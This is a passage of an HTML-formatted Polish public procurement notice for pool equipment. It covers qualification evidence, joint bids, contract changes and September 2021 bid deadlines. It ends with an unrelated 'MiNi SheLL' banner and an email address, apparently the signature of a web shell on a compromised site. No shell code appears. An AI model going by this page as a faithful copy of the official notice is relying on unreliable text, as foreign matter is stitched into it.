w innej walucie niż złoty polski – Zamawiający dokona przeliczenia tej kwoty na złote polskie na podstawie średniego kursu złotego w stosunku do walut obcych, określonego w Tabeli Kursów Narodowego Banku Polskiego na dzień wszczęcia postępowania.<br/><br/>b) dysponuje osobami, które zostaną skierowane do realizacji przedmiotu zamówienia i posiadają ważną książeczkę zdrowia na potrzeby sanitarno-epidemiologiczne lub orzeczenie do celów sanitarno-epidemiologicznych.<br/><br/>2.	Zamawiający informuje, iż Wykonawcy występujący wspólnie, w rozumieniu art. 58 ustawy Pzp, ww. warunki udziału w postępowaniu mogą spełniać wspólnie / łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie wskazanym przez Zamawiającego w Rozdziale VI pkt 1 SWZ, stanowiącego dowód potwierdzający brak podstaw wykluczenia z postępowania na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego środki dowodowe, o treści zgodnej ze wzorem stanowiącym załącznik nr 1 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.b)	oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie wskazanym przez Zamawiającego w Rozdziale VII pkt 1 SWZ, stanowiącego dowód potwierdzający spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego środki dowodowe, o treści zgodnej ze wzorem stanowiącym załącznik nr 2 do SWZ<br/>W celu potwierdzenia spełniania warunków udziału w postępowaniu oraz braku podstaw wykluczenia z postępowania, Wykonawca zobowiązany będzie do przedłożenia następujących oświadczeń i dokumentów (podmiotowych środków dowodowych):<br/>a)	wykaz robót/usług wykonanych nie wcześniej niż w okresie ostatnich 5 lat, licząc wstecz od dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał: co najmniej 1 (jedną) usługę o wartości brutto minimum 200 000,00 zł, polegającą na dostarczeniu i instalacji/montażu techniki basenowej do basenów wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane. Wzór wykazu robót/dostaw/usług stanowi załącznik nr 8 do SWZ,<br/>Uwaga: <br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót/usług opisanych powyżej, wykonanych wspólnie z innymi Wykonawcami, ww. wykaz, dotyczy robót, w których wykonaniu Wykonawca bezpośrednio uczestniczył.<br/>b)	dowody określające, czy wskazane w ww. wykazie dostawy/roboty/usługi zostały wykonane należycie. Przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy/roboty/usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty,<br/>c)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, posiadają ważną książeczkę zdrowia na potrzeby sanitarno-epidemiologiczne lub orzeczenie do celów sanitarno-epidemiologicznych. Wzór wykazu stanowi załącznik nr 9 do SWZ,<br/>d)	oświadczenie o aktualności informacji zawartych w złożonym w postępowaniu oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, dotyczące przesłanek wykluczenia z postępowania określonych przez Zamawiającego w Rozdziale VI pkt 1 SWZ. Wzór oświadczenia stanowi załącznik nr 10 do SWZ.<br/><br/>2)	Podmiotowe środki dowodowe sporządza się w postaci elektronicznej, zgodnie z nw. wytycznymi: <br/>a)	podmiotowe środki dowodowe wystawione przez Wykonawcę, Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podmiot udostępniający zasoby, przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. <br/>b)	w przypadku gdy podmiotowe środki dowodowe, zostały wystawione przez upoważnione podmioty inne niż Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby, jako dokument elektroniczny, przekazuje się ten dokument. <br/>c)	w przypadku gdy podmiotowe środki dowodowe: <br/>- zostały sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem przez Wykonawcę, Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podmiot udostępniający zasoby, <br/>- zostały wystawione przez upoważnione podmioty inne niż Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby, jako dokument w postaci papierowej,<br/> przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>d)	poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, dokonuje odpowiednio Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby, w zakresie dokumentu, który każdego z nich dotyczy albo notariusz.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (Wykonawcy występujący wspólnie, w rozumieniu art. 58 ustawy Pzp) są zobowiązani do ustanowienia Pełnomocnika, do: <br/>- reprezentowania ich w postępowaniu o udzielenie zamówienia, <br/>albo <br/>- do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	Pełnomocnictwo powinno zostać załączone do oferty, zgodnie z wymaganiami określonymi w Rozdziale IX część 2 pkt 2 ppkt 2 lit. f) SWZ.<br/>3.	Wykonawcy występujący wspólnie składają jedną ofertę, przy czym:<br/>a)	oświadczenie, o którym mowa w Rozdziale IX część 2 pkt 2 ppkt 2 lit. a) SWZ, składa każdy z Wykonawców oddzielnie. Oświadczenie to potwierdza brak podstaw do wykluczenia z postępowania w zakresie, określonym przez Zamawiającego,<br/>b)	oświadczenie, o którym mowa w Rozdziale IX część 2 pkt 2 ppkt 2 lit. b) SWZ, składa każdy z Wykonawców oddzielnie. Oświadczenie to potwierdza spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu,<br/>c)	pozostałe oświadczenia i dokumenty wskazane w Rozdziale IX część 2 pkt 2 SWZ, składają wszyscy Wykonawcy wspólnie.<br/>4.	Ofertę składa i podpisuje w imieniu wszystkich Wykonawców – Pełnomocnik lub wszyscy Wykonawcy, składający ofertę wspólną.<br/>5.	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres należy wpisać w formularzu ofertowym.<br/>6.	Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	W przypadkach przewidzianych w umowie dopuszcza się możliwość wprowadzenia zmian w<br/> treści umowy.<br/>2.	Zmiany umowy nie mogą wykraczać poza zakres świadczenia określony w niniejszej umowie.<br/>3.	Zmiany, o których mowa w ust. 1 mogą dotyczyć:<br/>1)	zmiany jakości, rodzaju materiałów lub innych parametrów charakterystycznych dla objętej proponowaną zmianą instalacji,<br/>2)	aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny,<br/>3)	zmiany producenta urządzeń lub wyposażenia, <br/>4)	wysokości wynagrodzenia określonego w § 12 ust. 4 pkt 7 lit. c.<br/>4.	Warunkiem dokonania zmian, o których mowa w ust. 6, jest złożenie wniosku przez Stronę<br/> inicjującą zmianę, zawierającego:<br/>1)	opis propozycji zmiany,<br/>2)	uzasadnienie zmiany,<br/>3)	obliczenie kosztów zmiany zgodnie z zasadami zawartymi w umowie, jeżeli zmiana będzie miała wpływ na wynagrodzenie Wykonawcy,<br/>4)	opis wpływu zmiany na postęp robót i termin wykonania umowy.<br/>5.	Zmiany, o których mowa w ust. 6, mogą zostać dokonane, jeżeli ich uzasadnieniem są niżej <br/> wymienione okoliczności:<br/>1)	obniżenie kosztu wykonania robót lub kosztu eksploatacji (użytkowania) obiektu,<br/>2)	zmiana obowiązujących przepisów,<br/>3)	podniesienie wydajności urządzeń,<br/>4)	podniesienie bezpieczeństwa wykonywania robót,<br/>5)	siła wyższa,<br/>6)	z przyczyn niezależnych od stron powstanie konieczność uzyskania lub realizacji uzgodnień, opinii lub decyzji.<br/>6.	W przypadku konieczności wykonania zamówień dodatkowych, niemożliwych wcześniej do przewidzenia, których nie uwzględniono w zamówieniu podstawowym, o ile stały się one niezbędne, których wykonanie spowoduje konieczność wydłużenia terminu realizacji przedmiotu niniejszej umowy strony przewidują możliwość wydłużenia terminu realizacji Przedmiotu Umowy, o którym mowa w § 2 ust. 1 pkt 2), po wprowadzeniu stosownych zmian do umowy, w formie aneksu do umowy podpisanego przez obie strony.<br/>7.	Wykonawca nie będzie uprawniony do żadnego przedłużenia terminu wykonania umowy, jeżeli zmiana umowy jest wymuszona uchybieniem czy naruszeniem umowy przez Wykonawcę – w takim przypadku koszty dodatkowe związane z takimi zmianami ponosi Wykonawca.<br/>8.	Zamawiający dopuszcza możliwość zmiany osób, o których mowa w § 16 ust.1 na inne osoby, na podstawie aneksu sporządzonego na pisemny, umotywowany wniosek Wykonawcy. Do wniosku dołączyć należy oświadczenie i dokumenty potwierdzające, że osoby zaproponowane przez Wykonawcę posiadają co najmniej takie same uprawnienia, kwalifikacje oraz spełniają kryteria co najmniej w takim samym zakresie, jak osoby zastępowane. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-14 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://osirursus.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-14 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-14</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> kryterium ceny

Creat By MiNi SheLL
Email: jattceo@gmail.com